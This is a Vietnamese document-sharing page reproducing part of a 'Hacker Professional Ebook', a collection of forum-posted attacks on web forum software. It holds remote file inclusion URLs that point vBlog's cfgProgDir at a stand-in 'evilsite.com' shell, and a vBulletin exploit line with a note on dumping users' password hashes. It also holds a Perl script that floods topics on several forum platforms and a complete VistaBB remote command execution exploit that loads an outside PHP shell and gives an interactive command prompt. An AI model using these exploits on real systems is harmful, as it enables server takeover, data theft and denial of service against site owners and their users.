1. Trang chủ
  2. » Công Nghệ Thông Tin

Hacker Professional Ebook part 437 ppt

10 94 0
Tài liệu đã được kiểm tra trùng lặp

Đang tải... (xem toàn văn)

THÔNG TIN TÀI LIỆU

Thông tin cơ bản

Định dạng
Số trang 10
Dung lượng 74,18 KB

Các công cụ chuyển đổi và chỉnh sửa cho tài liệu này

Nội dung

vns3curityHCE View Topic Flood phpBB, MercuryBoard, Vbulletin, Ipb Hàng copy... # This exploit comes with it's own php shell setting.

Trang 1

black_hat_cr(HCE)

vBlog / C12 0.1 (cfgProgDir) Remote File Include Vulnerabilities

Code:

* Portal Name :Vortex Blog AKA vBlog

* Class = Remote File Inclusion ;

* Download

=http://switch.dl.sourceforge.net/sourceforge/c12/C12_a0.1_nonfunc.zip

* Found by = Dr.Pantagon (rezayavari2006@yahoo.com)

-

-

- Vulnerable Code

include($cfgProgDir "session.php");

++++++++++++++++++++++++++++++++++++++++++++

- Exploit:

http://[target]/[path]/admin/auth/secure.php?cfgProgDir=http://evilsite.com/shell?

http://[target]/[path]/admin/auth/checklogin.php?cfgProgDir=http://evilsite.com/sh ell?

Black_hat_cr(HCE)

vBulletin 3.5.4 (install_path) Exploit

Trang 2

by: CarcaBot

-

application : vbulletin

-

URL : http://www.vbulletin.com

-

Exploit:

http://www.vicitimsite.com/forumpath =http://CarcaB

ot.Ro

-

More Details:

Dump SQL DB named user then u have access at all md5 users passwords

vns3curity(HCE)

View Topic Flood phpBB, MercuryBoard, Vbulletin, Ipb

Hàng copy

Trang 3

Code:

#!/usr/bin/perl

print q{

_

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

>>>>>>>>>>>>>>

/ \

\ \ ,, / /

'-.`\()/`.-'

. _'( )'_

/ /` /`""`\ `\ \ * SpiderZ ForumZ Security *

| | >< | |

\ \ / /

'. .'

=> View Topic Flood phpBB, MercuryBoard, Vbulletin, Ipb

=> Sito: www.spiderz.altervista.org

=> Sito2: www.spiderz.netsons.org

=> Author: SpiderZ

=> Bug trovato da Gaggo, Exploit creato da SpiderZ

_

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

>>>>>>>>>>>>>>

};

use IO::Socket;

print q{

-

=> Exploit created by: SpiderZ

=> Inserisci l'url del sito

=> senza inserire ( www - HTTP )

=> };

$host = <STDIN>;

chop ($host);

Trang 4

print q{

-

=> Indica la cartella

=> cartella: ( /Forum/ )

=> };

$pth = <STDIN>;

chop ($pth);

print q{

-

=> phpBB ( viewtopic.php?t= )

=> MercuryBoard ( index.php?a=topic&t= )

=> Vbulletin ( showthread.php?t= )

=> Ipb ( index.php?showtopic= )

=> };

$t = <STDIN>;

chop ($t);

print q{

-

=> Numero Topic

=> Es: viewtopic.php?t=1 ( 1, 2, 3, ecc )

=> };

$topic = <STDIN>;

chop ($topic);

print q{

-

=> Quante volte vuoi fare il flood ? ( 1 / 10000 )

=> };

$while = <STDIN>;

chop ($while);

while($x != $while )

{

$lrg = length $postit;

my $sock = new IO::Socket::INET

(

PeerAddr => "$host",

PeerPort => "80",

Proto => "tcp",

);

die "\nThe Socket: $!\n" unless $sock;

Trang 5

print $sock "POST $pth"."$t$topic HTTP/1.1\n";

print $sock "Host: $host\n";

print $sock "Referer: $host\n";

print $sock "Connection: Keep-Alive\n";

print $sock "Cache-Control: no-cache\n";

print $sock "Content-Length: $lrg\n\n";

print $sock "$postit\n";

close($sock);

syswrite STDOUT, ".";

$x++;

}

print q{

-

=> Attacco Completato !

=> www.spiderz.tk

-

};

black_hat_cr(HCE)

VistaBB <= 2.x Multiple File Inclusion

Ếch bờ loi bằng perl :

Trích:

#!/usr/bin/perl

# Method found and exploit scripted by nukedx

# Contacts> ICQ: 10072 Web: http://www.nukedx.com MAIL/MSN:

nukedx@nukedx.com

# Original advisory can be found at: http://www.nukedx.com/?viewdoc=48

#

# VistaBB <= 2.x Remote Command Execution Exploit

#

Trang 6

# This exploit comes with it's own php shell setting If you wanna change it your file must contain this data >

#

# <?php

# echo "_START_\n";

# ini_set("max_execution_time",0);

# error_reporting(0);

# passthru($_REQUEST[command]);

# echo "\n_END_";

# ?>

#

# Copyright 2006 (C) nukedx

#

# Greetz to: WW,xT,php from my team NWPX , str0ke , cha0s , Preddy , Yns ,

|SaMaN|, Caesar , Ogre and all of my friends

use IO::Socket;

# Default configuration

$shell = "http://hometown.aol.com/yarivgiladi/sh.php";

# Checking user settings

if(@ARGV != 2) { usage(); }

else { exploit(); }

sub header()

{

print "\n- NukedX Security Advisory Nr.2006-44\r\n";

print "- VistaBB <= 2.x Remote Command Execution Exploit\r\n";

}

sub usage()

{

header();

print "- Usage: $0 <host> <path>\r\n";

print "- <host> -> Victim's host ex: www.victim.com\r\n";

print "- <path> -> Path to VistaBB ex: /vistabb/ or just /\r\n";

exit();

}

Trang 7

sub exploit() {

# User variables

$host = $ARGV[0];

$host =~ s/(http:\/\/)//eg;

$target = $ARGV[1]."includes/functions_mod_user.php";

$good = 0;

$c2s = "command=whoami";

$c2slen = length($c2s);

print "Trying to connect: $host\r\n";

$sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => $host, PeerPort => 80) || die "Connection failed \r\n";

print "Connected to victim: $host\r\n";

print $sock "POST $target HTTP/1.1\n";

print $sock "Host: $host\n";

print $sock "Accept: */*\n";

print $sock "Referer: $host\r\n";

print $sock "Accept-Language: tr\r\n";

print $sock "Content-Type: application/x-www-form-urlencoded\r\n";

print $sock "Accept-Encoding: gzip, deflate\r\n";

print $sock "User-Agent: NukeZilla\r\n";

print $sock "Cookie: phpbb_root_path=".$shell."?\r\n";

print $sock "Content-length: $c2slen\r\n";

print $sock "Connection: Keep-Alive\r\n";

print $sock "Cache-Control: no-cache\r\n\r\n";

print $sock $c2s;

print $sock "\r\n\r\n";

while($result = <$sock>)

{

if($result =~ /^_END_/)

{

$good=0;

close($sock);

}

if($good==1)

Trang 8

{

if (!$whoami) {

$whoami = trim($result);

print "Logged as $whoami\r\nType exit for exit dont press ctrl+c\r\n";

}

}

if ($good==0)

{

if ($result =~ /Warning: include_once/) { print "Sorry victim is not

vulnerable \r\nClosing exploit \r\n";sleep(3);exit(); }

}

if($result =~ /^_START_/)

{

$good=1;

}

}

while()

{

print "[".$whoami."@".$host." /]\$ ";

while(<STDIN>)

{

$cmds=$_;

chomp($cmds);

last;

}

if ($cmds =~ /^exit/) { print "Closing exploit \r\n";sleep(3);exit(); }

else { sendcmd(); }

}

}

sub sendcmd () {

$c2s = "command=".$cmds;

$c2slen = length($c2s);

$sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => $host, PeerPort => 80) || die "Connection lost \r\n";

Trang 9

print $sock "POST $target HTTP/1.1\n";

print $sock "Host: $host\n";

print $sock "Accept: */*\n";

print $sock "Referer: $host\r\n";

print $sock "Accept-Language: tr\r\n";

print $sock "Content-Type: application/x-www-form-urlencoded\r\n";

print $sock "Accept-Encoding: gzip, deflate\r\n";

print $sock "User-Agent: NukeZilla\r\n";

print $sock "Cookie: phpbb_root_path=".$shell."?\r\n";

print $sock "Content-length: $c2slen\r\n";

print $sock "Connection: Keep-Alive\r\n";

print $sock "Cache-Control: no-cache\r\n\r\n";

print $sock $c2s;

print $sock "\r\n\r\n";

while($result = <$sock>)

{

if($result =~ /^_END_/)

{

$good=0;

close($sock);

}

if($good==1)

{

print $result;

}

if ($good==0)

{

if ($result =~ /Warning: include_once/) { print "Sorry victim is not vulnerable or patched! \r\nClosing exploit \r\n";sleep(3);exit(); }

}

if($result =~ /^_START_/)

{

$good=1;

}

Trang 10

}

}

sub trim($)

{

my $string = shift;

$string =~ s/^\s+//;

$string =~ s/\s+$//; return $string; }

Ngày đăng: 04/07/2014, 12:20

Xem thêm

TÀI LIỆU CÙNG NGƯỜI DÙNG

TÀI LIỆU LIÊN QUAN